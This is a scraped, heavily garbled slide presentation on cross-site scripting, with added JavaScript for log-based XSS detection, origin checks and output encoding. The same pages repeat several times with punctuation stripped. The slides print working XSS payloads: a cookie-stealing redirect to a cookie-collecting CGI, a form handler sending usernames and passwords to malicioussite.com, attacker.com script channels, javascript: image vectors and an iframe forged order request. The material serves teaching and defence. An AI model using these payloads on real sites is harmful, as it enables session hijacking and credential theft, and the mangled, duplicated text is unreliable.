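  return { ip: m[1], time: m[2], method: m[3], target: m[4], status: Number(m[5]) };
}

// Decode the query the way the application would see it; tolerate bad escapes.
function decodeLoosely(s) {
  try { return decodeURIComponent(s.replace(/\+/g, ' ')); } catch (e) { return s; }
}

// Signatures keyed to the leakage patterns on the slide.
const SIGNATURES = [
  { name: 'script-tag', re: /<\s*script\b/i },
  { name: 'cookie-read', re: /document\s*\.\s*cookie/i },
  { name: 'frame-injection', re: /<\s*iframe\b/i },
  { name: 'event-handler', re: /\bon[a-z]+\s*=/i },
  { name: 'script-scheme', re: /\b(javascript|vbscript)\s*:/i },
];

// One finding per log line whose decoded query matches at least one signature.
function scanAccessLog(lines) {
  const findings = [];
  for (const line of lines) {
    const req = parseLogLine(line);
    if (!req) continue;
    const q = req.target.indexOf('?');
    if (q === -1) continue;
    const query = decodeLoosely(req.target.slice(q + 1));
    const hits = SIGNATURES.filter((s) => s.re.test(query)).map((s) => s.name);
    if (hits.length) findings.push({ ip: req.ip, path: req.target.slice(0, q), signatures: hits });
  }
  return findings;
}
```

`scanAccessLog(SAMPLE_LOG)` returns three findings: the cookie-theft request (script-tag and cookie-read), the iframe request (frame-injection) and the onerror request (event-handler); the plain `hello world` request is not reported. Decoding before matching matters: the raw log line contains `%3Cscript%3E`, not `<script>`.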

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES

1. http://www.cgisecurity.com/archive/php/phpNuke_cross_site_scripting.txt

2. http://www.cgisecurity.com/archive/php/phpNuke_CSS_5_holes.txt

3. http://www.cgisecurity.com/archive/php/phpNuke_2_more_CSS_holes.txt

37

Related vulnerabilities

Several classes of vulnerabilities or attack techniques are related to XSS. Cross-zone scripting exploits "zone" concepts in certain browsers and usually executes code with a greater privilege.[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems at the HTTP protocol level (in addition to enabling attacks such as HTTP response splitting).[32]

Cross-site request forgery (CSRF/XSRF) is almost the opposite of XSS, in that rather than exploiting the user's trust in a site, the attacker (and his malicious page) exploits the site's trust in the client software, submitting requests that the site believes represent conscious and intentional actions of authenticated users.[33]

Lastly, SQL injection exploits a vulnerability in the database layer of an application. When user input is incorrectly filtered, attacker-supplied SQL statements can be executed by the application.

  • Slide 1
  • Dynamic content
  • Slide 3
  • Cross Site Scripting
  • Slide 5
  • Causes
  • Threats …
  • How it is performed
  • Slide 9
  • Slide 10
  • Slide 11
  • Persistent…
  • Slide 13
  • Scripting Via Malicious Link…
  • In this scenario the attacker sends a specially crafted e-mai
  • Slide 16
  • If any part of the Web site uses cookies then it may be possib
  • Sending an Unauthorized Request
  • In this scenario the user unknowingly executes scripts written
  • By Scripting
  • Slide 21
  • Some FACTS about the XSS attacks…
  • By SURVEY…
  • Slide 24
  • Dynamic XSS with 2way comms
  • Slide 26
  • Slide 27
  • Slide 28
  • Filtering
  • Cookie Security
  • Disabling Scripts…
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
Page 20: Internet hacking presentation

20

By Scripting

21

Script can read all HTML content/tags in the other window.

Script can set/delete tags/content in the other window. We can read and set form values, then run a submit().

Script can set vars and call functions in the other window.

document.write can allow script to create new tags/content in the other window.

This means that a script can read all HTML contents of a document, change the appearance of the document, modify existing tags and values, and modify and submit forms. We have full control of the other window as long as it's in the same document.domain.

If we can forward cookies then we can also forward other JScript-accessible content to an attacker. We can forward page contents, form values (including hidden…), JScript vars/state and JScript errors.
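The rule behind "as long as it's in the same document.domain" is the same-origin policy: a script may touch another window only when both documents share scheme, host and port, or when both have opted in via document.domain. As an added example (not code from the original slides), the Node.js code below implements that comparison; the URLs use the slide's own trustedserver.com plus an assumed attacker host, and the public-suffix check that browsers also apply to document.domain is omitted.

```javascript
// Added example (not code from the original slides): the origin comparison
// that decides whether script in one window may read or modify another, which
// is why script injected into trustedserver.com has full control over every
// other trustedserver.com window. Hostnames other than trustedserver.com are
// assumptions for the example.

// Origin = (scheme, host, port); the URL parser already drops a default port,
// so it is restored here for comparison.
function origin(url) {
  const u = new URL(url);
  const scheme = u.protocol.replace(':', '');
  const defaultPort = scheme === 'https' ? '443' : '80';
  return { scheme, host: u.hostname, port: u.port || defaultPort };
}

// Plain same-origin check used when neither page touches document.domain.
function sameOrigin(a, b) {
  const x = origin(a), y = origin(b);
  return x.scheme === y.scheme && x.host === y.host && x.port === y.port;
}

// Legacy document.domain relaxation: both pages must set it to the same value,
// and that value must be each page's host or a parent domain of it. The
// public-suffix refusal (e.g. setting it to "com") is omitted here (assumption).
function canAccessWithDocumentDomain(a, b, domainA, domainB) {
  if (sameOrigin(a, b)) return true;
  const x = origin(a), y = origin(b);
  if (x.scheme !== y.scheme) return false;
  if (!domainA || domainA !== domainB) return false;
  const isSuffixOf = (host, domain) => host === domain || host.endsWith('.' + domain);
  return isSuffixOf(x.host, domainA) && isSuffixOf(y.host, domainB);
}

// Slide scenario: script injected via xss.asp opening the authenticated area.
const INJECTION_PAGE = 'http://www.trustedserver.com/xss.asp?name=x';
const TARGET_PAGE = 'http://www.trustedserver.com/auth_area/orderupdate?items=4000';
```

`sameOrigin(INJECTION_PAGE, TARGET_PAGE)` is true, which is the whole problem: the injected script does not come from attacker.example, it runs as trustedserver.com. The same check is false across https/http or across hosts, and document.domain only widens it for hosts under one parent domain.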

22

Some FACTS about the XSS attacks……

23

By SURVEY……

1st Gen XSS was against public sites and ran against everyone that visited the site.

2nd Gen XSS focused on sites that reflect the user's own input back (reflected XSS).

24

• Cross-site scripting attacks are a special case of code injection.

• Cross-site scripting carried out on websites made up roughly 80% of all security vulnerabilities documented by Symantec as of 2007.

• Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data.

25

Dynamic XSS with 2-way comms

[Diagram: Victim Browser, XSS Vulnerable Server, Attacker System]

XSS against the site: the injected script runs in the victim's browser and opens an IFRAME into which other documents on the site are loaded. Script commands run here.

<script src="attacker.com/innerHTML_of_IFRAME">: the contents of the frame are sent to the attacker's system as part of a script request.

New jscript… <script src="attacker.com">: the attacker's system answers with the next script to run, giving two-way communication.

26

Some prominent sites that have been affected in the past are… the search engine Google, the email services of Google and Yahoo, and the social networking sites Facebook, MySpace and Orkut. The developers of MediaWiki have fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users.

Researchers have claimed that as many as 68 of websites are likely open to XSS attacks

27

By seeing all this the question that arises ishelliphellip

Then how can we prevent it

28

Yes some methods are there for

prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES

1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt

2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt

3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt

37

Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]

Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]

Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application

  • Slide 1
  • Dynamic content
  • Slide 3
  • Cross Site Scripting
  • Slide 5
  • Causes
  • Threats helliphelliphelliphelliphellip
  • How it is performed
  • Slide 9
  • Slide 10
  • Slide 11
  • Persistenthellip
  • Slide 13
  • Scripting Via Malicious Linkhellip
  • In this scenario the attacker sends a specially crafted e-mai
  • Slide 16
  • If any part of the Web site uses cookies then it may be possib
  • Sending an Unauthorized Request
  • In this scenario the user unknowingly executes scripts written
  • By Scripting
  • Slide 21
  • Some FACTS about the XSS attackshelliphelliphellip
  • By SURVEYhelliphelliphellip
  • Slide 24
  • Dynamic XSS with 2way comms
  • Slide 26
  • Slide 27
  • Slide 28
  • Filtering
  • Cookie Security
  • Disabling Scriptshellip
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
Page 21: Internet hacking presentation

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

Dynamic XSS with 2way commsVictim Browser

XSS against site

IFRAME

Script commands run here

Other documents on site loaded into here

ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt

XSS Vulnerable Server

Attacker System

New jscripthellip

ltscript src=ldquoattackercomrdquogt

26

Some prominent sites that have been affected in the past arehelliphellip

The search engine Google The email services of Google and

Yahoo The social networking sites Facebook

MySpace and Orkut The developers of MediaWiki have

fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users

Researchers have claimed that as many as 68 of websites are likely open to XSS attacks

27

By seeing all this the question that arises ishelliphellip

Then how can we prevent it

28

Yes some methods are there for

prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES

1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt

2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt

3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt

37

Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]

Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]

Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application

  • Slide 1
  • Dynamic content
  • Slide 3
  • Cross Site Scripting
  • Slide 5
  • Causes
  • Threats helliphelliphelliphelliphellip
  • How it is performed
  • Slide 9
  • Slide 10
  • Slide 11
  • Persistenthellip
  • Slide 13
  • Scripting Via Malicious Linkhellip
  • In this scenario the attacker sends a specially crafted e-mai
  • Slide 16
  • If any part of the Web site uses cookies then it may be possib
  • Sending an Unauthorized Request
  • In this scenario the user unknowingly executes scripts written
  • By Scripting
  • Slide 21
  • Some FACTS about the XSS attackshelliphelliphellip
  • By SURVEYhelliphelliphellip
  • Slide 24
  • Dynamic XSS with 2way comms
  • Slide 26
  • Slide 27
  • Slide 28
  • Filtering
  • Cookie Security
  • Disabling Scriptshellip
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
Page 22: Internet hacking presentation

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

Dynamic XSS with 2way commsVictim Browser

XSS against site

IFRAME

Script commands run here

Other documents on site loaded into here

ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt

XSS Vulnerable Server

Attacker System

New jscripthellip

ltscript src=ldquoattackercomrdquogt

26

Some prominent sites that have been affected in the past arehelliphellip

The search engine Google The email services of Google and

Yahoo The social networking sites Facebook

MySpace and Orkut The developers of MediaWiki have

fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users

Researchers have claimed that as many as 68 of websites are likely open to XSS attacks

27

By seeing all this the question that arises ishelliphellip

Then how can we prevent it

28

Yes some methods are there for

prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES

1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt

2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt

3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt

37

Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]

Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]

Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application

  • Slide 1
  • Dynamic content
  • Slide 3
  • Cross Site Scripting
  • Slide 5
  • Causes
  • Threats helliphelliphelliphelliphellip
  • How it is performed
  • Slide 9
  • Slide 10
  • Slide 11
  • Persistenthellip
  • Slide 13
  • Scripting Via Malicious Linkhellip
  • In this scenario the attacker sends a specially crafted e-mai
  • Slide 16
  • If any part of the Web site uses cookies then it may be possib
  • Sending an Unauthorized Request
  • In this scenario the user unknowingly executes scripts written
  • By Scripting
  • Slide 21
  • Some FACTS about the XSS attackshelliphelliphellip
  • By SURVEYhelliphelliphellip
  • Slide 24
  • Dynamic XSS with 2way comms
  • Slide 26
  • Slide 27
  • Slide 28
  • Filtering
  • Cookie Security
  • Disabling Scriptshellip
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
Page 23: Internet hacking presentation

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

Dynamic XSS with 2way commsVictim Browser

XSS against site

IFRAME

Script commands run here

Other documents on site loaded into here

ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt

XSS Vulnerable Server

Attacker System

New jscripthellip

ltscript src=ldquoattackercomrdquogt

26

Some prominent sites that have been affected in the past arehelliphellip

The search engine Google The email services of Google and

Yahoo The social networking sites Facebook

MySpace and Orkut The developers of MediaWiki have

fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users

Researchers have claimed that as many as 68 of websites are likely open to XSS attacks

27

By seeing all this the question that arises ishelliphellip

Then how can we prevent it

28

Yes some methods are there for

prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES

1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt

2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt

3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt

37

Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]

Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]

Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application

  • Slide 1
  • Dynamic content
  • Slide 3
  • Cross Site Scripting
  • Slide 5
  • Causes
  • Threats helliphelliphelliphelliphellip
  • How it is performed
  • Slide 9
  • Slide 10
  • Slide 11
  • Persistenthellip
  • Slide 13
  • Scripting Via Malicious Linkhellip
  • In this scenario the attacker sends a specially crafted e-mai
  • Slide 16
  • If any part of the Web site uses cookies then it may be possib
  • Sending an Unauthorized Request
  • In this scenario the user unknowingly executes scripts written
  • By Scripting
  • Slide 21
  • Some FACTS about the XSS attackshelliphelliphellip
  • By SURVEYhelliphelliphellip
  • Slide 24
  • Dynamic XSS with 2way comms
  • Slide 26
  • Slide 27
  • Slide 28
  • Filtering
  • Cookie Security
  • Disabling Scriptshellip
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
Page 24: Internet hacking presentation

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

Dynamic XSS with 2way commsVictim Browser

XSS against site

IFRAME

Script commands run here

Other documents on site loaded into here

ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt

XSS Vulnerable Server

Attacker System

New jscripthellip

ltscript src=ldquoattackercomrdquogt

26

Some prominent sites that have been affected in the past arehelliphellip

The search engine Google The email services of Google and

Yahoo The social networking sites Facebook

MySpace and Orkut The developers of MediaWiki have

fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users

Researchers have claimed that as many as 68 of websites are likely open to XSS attacks

27

By seeing all this, the question that arises is…

Then how can we prevent it?

28

Yes, some methods are there for prevention, and those are:

>> Filtering
>> Cookie Security
>> Disabling Scripts
>> Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields, or to escape all untrusted data using a method appropriate for the output context. There are several different escaping schemes that must be used depending on where the untrusted string needs to be placed, including HTML numeric entity encoding, JavaScript escaping, CSS escaping and URL encoding. Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner.
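
Context-aware output encoding as this slide describes it, added here as an example that is not part of the original presentation; the encoder names and the profile-page markup are assumptions. One untrusted value is placed in four output contexts, each with the escaping scheme that context needs.

```javascript
// Added example (not from the original slides): one encoder per output
// context. Using the wrong one (e.g. HTML-escaping data that lands inside
// a <script> string or a style value) leaves that context exploitable.

// HTML body / quoted-attribute context: encode the characters HTML parses.
function encodeForHtml(s) {
  return String(s).replace(/[&<>"'\/]/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;',
    '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
  })[c]);
}

// JavaScript string-literal context: \xHH / \uHHHH-escape everything outside
// [A-Za-z0-9], so a quote, backslash or "</script>" can never end the literal.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 256
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// CSS value context: CSS hex escape (backslash, hex digits, terminating space).
function encodeForCss(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) =>
    '\\' + c.charCodeAt(0).toString(16) + ' ');
}

// URL query-parameter context: percent-encode the value. The finished URL
// still has to be HTML-encoded when it is placed inside an href attribute.
function encodeForUrlParam(s) {
  return encodeURIComponent(String(s));
}

// Render a (hypothetical) profile page where the same untrusted value lands
// in HTML text, an href, a style attribute and a script block.
function renderProfile(name) {
  return [
    `<h1>Hello ${encodeForHtml(name)}</h1>`,
    `<a href="/search?q=${encodeForHtml(encodeForUrlParam(name))}">search</a>`,
    `<div style="font-family: ${encodeForCss(name)}">`,
    `<script>var who = "${encodeForJsString(name)}";</script>`,
  ].join('\n');
}
```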

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests, and because client-side scripts generally have access to these cookies, simple XSS exploits can steal them. To mitigate this particular threat, many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie.

31

Disabling Scripts…

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis.

Functionality that blocks all scripting and external inclusions by default, and then allows the user to enable it on a per-domain basis, is more effective…

Problems with this… Substantial reduction in functionality and responsiveness. Many sites do not work without client-side scripting, forcing users to disable protection for that site and opening their systems to the threat.

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view, and to use its search engine to find the content.

33

For explanation purposes:

Remember the syntax…

34

SYNTAX: script injection in an image src tag

• Embed nested quotes
• ' or " or \u0022 \u0027
• Keyword filters that allow any js to execute are useless
• A = 'navi'; B = 'gator.userAgent'; alert(eval(A+B))
Limited input length + script block embed = unlimited script power (script src=)
• SSL pages warn if script src comes from an untrusted site
• but if you can upload, say, an img that is actually js commands…
• methods of script encoding
